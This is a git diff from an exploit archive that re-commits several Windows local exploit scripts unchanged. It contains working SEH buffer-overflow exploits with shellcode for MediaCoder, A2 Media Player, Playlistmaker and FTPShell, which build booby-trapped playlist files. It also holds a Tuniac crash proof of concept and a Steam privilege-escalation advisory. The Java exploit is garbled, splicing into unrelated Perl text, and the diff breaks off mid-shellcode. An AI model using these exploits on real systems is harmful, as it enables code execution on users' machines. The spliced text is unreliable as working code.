-#[+] Bug : MediaCoder 0.7.1.4486 (.lst) Universal Buffer overflow (SEH)
-#[+] Author : germaya_x
-#[+] Greetz : hack4love
-#[+] tested on: sp3 (EN)
-##########################################################
-
-# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-my $shellcode =
-"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".
-"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".
-"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".
-"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".
-"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec".
-"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae".
-"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01".
-"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2".
-"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e".
-"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a";
-
-my $junk="\x41" x 768;
-my $next_seh="\x87\x51\x37\x00"; # jmp esp in sdl.dll
-my $seh="\x31\x66\x66\x31"; # pop pop ret->mediacoder.exe
-
-open(myfile,'>>exploit.lst');
-print myfile $junk.$next_seh.$seh.$shellcode;
-
-# milw0rm.com [2009-08-04]
+#!/usr/bin/perl
+#[+] Bug : MediaCoder 0.7.1.4486 (.lst) Universal Buffer overflow (SEH)
+#[+] Author : germaya_x
+#[+] Greetz : hack4love
+#[+] tested on: sp3 (EN)
+##########################################################
+
+# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+my $shellcode =
+"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".
+"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".
+"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".
+"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".
+"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec".
+"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae".
+"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01".
+"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2".
+"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e".
+"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a";
+
+my $junk="\x41" x 768;
+my $next_seh="\x87\x51\x37\x00"; # jmp esp in sdl.dll
+my $seh="\x31\x66\x66\x31"; # pop pop ret->mediacoder.exe
+
+open(myfile,'>>exploit.lst');
+print myfile $junk.$next_seh.$seh.$shellcode;
+
+# milw0rm.com [2009-08-04]
diff --git a/platforms/windows/local/936.c b/platforms/windows/local/936.c
index d10ef6741..9e23a8462 100755
--- a/platforms/windows/local/936.c
+++ b/platforms/windows/local/936.c
@@ -155,6 +155,6 @@ printf("Ftp Username : %s\n",FtpUsername); printf("Ftp Password : %s\n",FtpPassword); return 0; -} - -// milw0rm.com [2005-04-13] +} + +// milw0rm.com [2005-04-13]
diff --git a/platforms/windows/local/9364.py b/platforms/windows/local/9364.py
index 89606380a..62d8298d4 100755
--- a/platforms/windows/local/9364.py
+++ b/platforms/windows/local/9364.py
@@ -1,19 +1,19 @@
-#!/usr/bin/env python
-
-##############################################################################################
-#
-# Tuniac v.090517c (.M3U) Crash PoC
-# Found By: Dr_IDE
-# http://sourceforge.net/projects/tuniac/files/tuniac/090517/Tuniac_Setup_090517c.exe/download
-# Notes: Not sure if code execution is possible though. Maybe someone else can finish it off.
-#
-##############################################################################################
-
-# Play around here, anything seems to knock it out.
-buffer = ("http://" + "\x41" * (4444));
-
-f = open('Dr_IDE.M3U','w');
-f.write(buffer);
-f.close();
-
-# milw0rm.com [2009-08-05]
+#!/usr/bin/env python
+
+##############################################################################################
+#
+# Tuniac v.090517c (.M3U) Crash PoC
+# Found By: Dr_IDE
+# http://sourceforge.net/projects/tuniac/files/tuniac/090517/Tuniac_Setup_090517c.exe/download
+# Notes: Not sure if code execution is possible though. Maybe someone else can finish it off.
+#
+##############################################################################################
+
+# Play around here, anything seems to knock it out.
+buffer = ("http://" + "\x41" * (4444));
+
+f = open('Dr_IDE.M3U','w');
+f.write(buffer);
+f.close();
+
+# milw0rm.com [2009-08-05]
diff --git a/platforms/windows/local/937.c b/platforms/windows/local/937.c
index 7883b433e..87355793a 100755
--- a/platforms/windows/local/937.c
+++ b/platforms/windows/local/937.c
@@ -154,6 +154,6 @@ printf("Proxy Username : %s\n",Username); printf("Proxy Password : %s\n",Password); return 0; -} - -// milw0rm.com [2005-04-13] +} + +// milw0rm.com [2005-04-13]
diff --git a/platforms/windows/local/9377.pl b/platforms/windows/local/9377.pl
index 4d8ce1db0..814756bdd 100755
--- a/platforms/windows/local/9377.pl
+++ b/platforms/windows/local/9377.pl
@@ -1,45 +1,45 @@
-#!/usr/bin/perl
-# by hack4love
-# hack4love@hotmail.com
-# A2 Media Player ProV2.51(.m3u /m3l)Universal Local Buffer Exploit (SEH)
-# ## easy #### this work sooooooooo good####################################
-############################################################################
-##Thanks for WwW.Sec-ArT.CoM/cc team ##and 3asfh.net team###################
-##AND special THANKS FOR His0k4 i respect him so much god with him #########
-############################################################################
-# http://download.cnet.com/A2-Media-Player-Pro/3000-2141_4-10059847.html
-############################################################################
-my $bof="\x41" x 4103;
-my $nsh="\xEB\x06\x90\x90";
-my $seh="\x47\xa1\x01\x10";##Universal
-my $nop="\x90" x 20;
-my $sec=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x56\x43\x46\x42\x30\x5a";
-print $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-open(myfile,'>> HACK4LOVE.m3u');
-print myfile $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-
-# milw0rm.com [2009-08-06]
+#!/usr/bin/perl
+# by hack4love
+# hack4love@hotmail.com
+# A2 Media Player ProV2.51(.m3u /m3l)Universal Local Buffer Exploit (SEH)
+# ## easy #### this work sooooooooo good####################################
+############################################################################
+##Thanks for WwW.Sec-ArT.CoM/cc team ##and 3asfh.net team###################
+##AND special THANKS FOR His0k4 i respect him so much god with him #########
+############################################################################
+# http://download.cnet.com/A2-Media-Player-Pro/3000-2141_4-10059847.html
+############################################################################
+my $bof="\x41" x 4103;
+my $nsh="\xEB\x06\x90\x90";
+my $seh="\x47\xa1\x01\x10";##Universal
+my $nop="\x90" x 20;
+my $sec=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x56\x43\x46\x42\x30\x5a";
+print $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+open(myfile,'>> HACK4LOVE.m3u');
+print myfile $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+
+# milw0rm.com [2009-08-06]
diff --git a/platforms/windows/local/9379.pl b/platforms/windows/local/9379.pl
index 457bd5252..06b0519ee 100755
--- a/platforms/windows/local/9379.pl
+++ b/platforms/windows/local/9379.pl
@@ -1,31 +1,31 @@
-#!/usr/bin/perl
-#discoverd by: germaya_x
-#soft:Playlistmaker1.5 (m3l,m3u files) local buffer overflow exploit (SEH)
-#Download: http://proletsoft.freeservers.com/mmb/playlistmaker.html
-#tested on: xp sp3 (EN)
-#bug date:August 06 09
-#greetz:hack4love ,devil fucker ,angel
-###############################################################################################
-# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-my $shellcode =
-"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".
-"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".
-"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".
-"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".
-"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec".
-"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae".
-"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01".
-"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2".
-"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e".
-"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a"; -my $bof="A" x 992; -my $eip_next="\x33\xBF\x96\x7C"; # -my $nop="\x90" x 20; - -################################################################################################ -open(MYFILE,'>>radio.m3u'); -print MYFILE $bof.$eip_next.$nop.$shellcode; -close(MYFILE); -################################################################################################ - -# milw0rm.com [2009-08-06] +#!/usr/bin/perl +#discoverd by: germaya_x +#soft:Playlistmaker1.5 (m3l,m3u files) local buffer overflow exploit (SEH) +#Download: http://proletsoft.freeservers.com/mmb/playlistmaker.html +#tested on: xp sp3 (EN) +#bug date:August 06 09 +#greetz:hack4love ,devil fucker ,angel +############################################################################################### +# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com +my $shellcode = +"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38". +"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf". +"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3". +"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87". +"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec". +"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae". +"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01". +"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2". +"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e". 
+"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a"; +my $bof="A" x 992; +my $eip_next="\x33\xBF\x96\x7C"; # +my $nop="\x90" x 20; + +################################################################################################ +open(MYFILE,'>>radio.m3u'); +print MYFILE $bof.$eip_next.$nop.$shellcode; +close(MYFILE); +################################################################################################ + +# milw0rm.com [2009-08-06] diff --git a/platforms/windows/local/938.cpp b/platforms/windows/local/938.cpp index ec9e76b37..d7067a86f 100755 --- a/platforms/windows/local/938.cpp +++ b/platforms/windows/local/938.cpp @@ -749,6 +749,6 @@ int main(int argc, char **argv) printf("Make %s successful...\n", argv[2]); return 1; -} - -// milw0rm.com [2005-04-14] +} + +// milw0rm.com [2005-04-14] diff --git a/platforms/windows/local/9386.txt b/platforms/windows/local/9386.txt index 4ef18f343..26402c78b 100755 --- a/platforms/windows/local/9386.txt +++ b/platforms/windows/local/9386.txt 
@@ -1,69 +1,69 @@
-Steam (Multiple .exe's) Local Privilage Escalation
-
-By:
- MrDoug
- mrdoug13[at]gmail[dot]com
-
-Version Info:
- Steam windows client
- Built: Jun 30 2009, at 13:29:32
- Steam API: v008
- Steam Package versions: 54/894
-
-Greetz:
- Slappywag, Doomchip, Bolo, Eliwood, and the rest.
-
-Special Thanks:
- Jeremy Brown and Nine:Situations:Group...
- Their work led me to this.
-
-==================================================
-
-The latest Steam client, (and other Steam related executables)
-suffer the same privilage escelation issue we saw in Adobe Acrobat NOS
-the other day (http://milw0rm.com/exploits/9199). This is particularly
-bad becuase, by default, Steam starts atomaticly. That means that as
-soon as an administrator logs in... game over.
-
-==================================================
-
-POC:
-
-C:\>cacls "C:\Program Files\Steam\Steam.exe"
-C:\Program Files\Steam\Steam.exe BUILTIN\Users:F <-- (Danger Will Robinson!!)
- BUILTIN\Power Users:C
- BUILTIN\Administrators:F
- NT AUTHORITY\SYSTEM:F
-
-The executables listed below are also vulnerable, as well as many, MANY
-more that I have not mentioned. See for yourself.
-
-%programfiles%\Steam\uninstall_css.exe
-%programfiles%\Steam\Unwise32.exe
-%programfiles%\Steam\GameOverlayUI.exe
-%programfiles%\Steam\uninstall_steam.exe
-%programfiles%\Steam\WriteMiniDump.exe
-%programfiles%\Steam\bin\SteamService.exe
-
---The following are dependant on what games are installed.
-
-%programfiles%\Steam\common\audiosurf\Audiosurf.exe
-%programfiles%\Steam\common\audiosurf\testapp.exe
-%programfiles%\Steam\common\audiosurf\engine\QuestViewer.exe
-%programfiles%\Steam\common\left 4 dead\left4dead.exe
-%programfiles%\Steam\steamapps\[username]\counter-strike source\hl2.exe
-%programfiles%\Steam\steamapps\[username]\half-life 2\hl2.exe
-%programfiles%\Steam\steamapps\[username]\garrysmod\hl2.exe
-
-...etc...etc...etc...
-
-There are probably 100 more, just look around. I am yet to see an
-executable in the Steam directory with propor permissions.
-
-==================================================
-
-Exploit:
-
-So simple... write it yourself you silly goose :3
-
-# milw0rm.com [2009-08-07]
+Steam (Multiple .exe's) Local Privilage Escalation
+
+By:
+ MrDoug
+ mrdoug13[at]gmail[dot]com
+
+Version Info:
+ Steam windows client
+ Built: Jun 30 2009, at 13:29:32
+ Steam API: v008
+ Steam Package versions: 54/894
+
+Greetz:
+ Slappywag, Doomchip, Bolo, Eliwood, and the rest.
+
+Special Thanks:
+ Jeremy Brown and Nine:Situations:Group...
+ Their work led me to this.
+
+==================================================
+
+The latest Steam client, (and other Steam related executables)
+suffer the same privilage escelation issue we saw in Adobe Acrobat NOS
+the other day (http://milw0rm.com/exploits/9199). This is particularly
+bad becuase, by default, Steam starts atomaticly. That means that as
+soon as an administrator logs in... game over.
+
+==================================================
+
+POC:
+
+C:\>cacls "C:\Program Files\Steam\Steam.exe"
+C:\Program Files\Steam\Steam.exe BUILTIN\Users:F <-- (Danger Will Robinson!!)
+ BUILTIN\Power Users:C
+ BUILTIN\Administrators:F
+ NT AUTHORITY\SYSTEM:F
+
+The executables listed below are also vulnerable, as well as many, MANY
+more that I have not mentioned. See for yourself.
+
+%programfiles%\Steam\uninstall_css.exe
+%programfiles%\Steam\Unwise32.exe
+%programfiles%\Steam\GameOverlayUI.exe
+%programfiles%\Steam\uninstall_steam.exe
+%programfiles%\Steam\WriteMiniDump.exe
+%programfiles%\Steam\bin\SteamService.exe
+
+--The following are dependant on what games are installed.
+
+%programfiles%\Steam\common\audiosurf\Audiosurf.exe
+%programfiles%\Steam\common\audiosurf\testapp.exe
+%programfiles%\Steam\common\audiosurf\engine\QuestViewer.exe
+%programfiles%\Steam\common\left 4 dead\left4dead.exe
+%programfiles%\Steam\steamapps\[username]\counter-strike source\hl2.exe
+%programfiles%\Steam\steamapps\[username]\half-life 2\hl2.exe
+%programfiles%\Steam\steamapps\[username]\garrysmod\hl2.exe
+
+...etc...etc...etc...
+
+There are probably 100 more, just look around. I am yet to see an
+executable in the Steam directory with propor permissions.
+
+==================================================
+
+Exploit:
+
+So simple... write it yourself you silly goose :3
+
+# milw0rm.com [2009-08-07]
diff --git a/platforms/windows/local/9409.pl b/platforms/windows/local/9409.pl
index bb3001dfe..f1c4c5dd7 100755
--- a/platforms/windows/local/9409.pl
+++ b/platforms/windows/local/9409.pl
@@ -1,42 +1,42 @@
-#!/usr/bin/perl
-# by hack4love
-# hack4love@hotmail.com
-# MediaCoder 0.7.1.4490 (.lst & .m3u) Universal Buffer overflow (SEH)
-# download :::http://www.mediacoderhq.com
-#################################################################################
-####Thanks for WwW.Sec-ArT.CoM/cc team ##and 3asfh.net team######################
-#################################################################################
-my $bof="\x41" x 764;
-my $nsh="\xEB\x06\x90\x90";
-my $seh="\x26\x59\x01\x66";#C:\Program Files\MediaCoder\libiconv-2.dll#p/p/r #unvi
-my $nop="\x90" x 20;
-my $sec=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". -"\x4e\x56\x43\x46\x42\x30\x5a"; -print $bof.$nsh.$seh.$nop.$sec; -################################################################### -open(myfile,'>> HACK4LOVE.m3u'); -print myfile $bof.$nsh.$seh.$nop.$sec; -################################################################### - -# milw0rm.com [2009-08-10] +#!/usr/bin/perl +# by hack4love +# hack4love@hotmail.com +# MediaCoder 0.7.1.4490 (.lst & .m3u) Universal Buffer overflow (SEH) +# download :::http://www.mediacoderhq.com +################################################################################# +####Thanks for WwW.Sec-ArT.CoM/cc team ##and 3asfh.net team###################### +################################################################################# +my $bof="\x41" x 764; +my $nsh="\xEB\x06\x90\x90"; +my $seh="\x26\x59\x01\x66";#C:\Program Files\MediaCoder\libiconv-2.dll#p/p/r #unvi +my $nop="\x90" x 20; +my $sec= +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". +"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". +"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". +"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". +"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". +"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". +"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". +"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". +"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". 
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". +"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". +"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". +"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". +"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". +"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". +"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". +"\x4e\x56\x43\x46\x42\x30\x5a"; +print $bof.$nsh.$seh.$nop.$sec; +################################################################### +open(myfile,'>> HACK4LOVE.m3u'); +print myfile $bof.$nsh.$seh.$nop.$sec; +################################################################### + +# milw0rm.com [2009-08-10] diff --git a/platforms/windows/local/9426.java b/platforms/windows/local/9426.java index 86d211ef9..46649d88a 100755 --- a/platforms/windows/local/9426.java +++ b/platforms/windows/local/9426.java 
@@ -1,40 +1,40 @@ -/* - * FTPShell Client, Name Session Stack Overflow Exploit - * Tested on Version 4.1 RC2 on Windows XP SP3 - * Vulnerable program download page : http://www.ftpshell.com/downloadclient.htm - * Coded by zec - * Feel yourself freely to get into touch : zec@bsdmail.com - */ - -package ftpbof; -import java.io.DataOutputStream; -import java.io.FileNotFoundException; -import java.io.FileOutputStream; -import java.io.IOException; -/** - * @author zec - */ -public class Main { - public static void main(String[] args) throws IOException { - /* Shellcode calc.exe - * jmp esp 0x7C86467B - */ - byte[] data = new byte[2548]; - for(int i = 1; i>LOAD PLAYLIST>>HACK4LOVE.PLS>>DOUBLE CLICK TO PLAY >BOOM CALC -#################################################################### -my $bof="\x41" x 4108; -my $nsh="\xEB\x06\x90\x90"; -my $seh="\x17\x07\x01\x10";#xaudio.dll####P/P/R -my $nop="\x90" x 20; -#################################################################### -my $sec= -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". -"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". -"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". -"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". -"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". -"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". 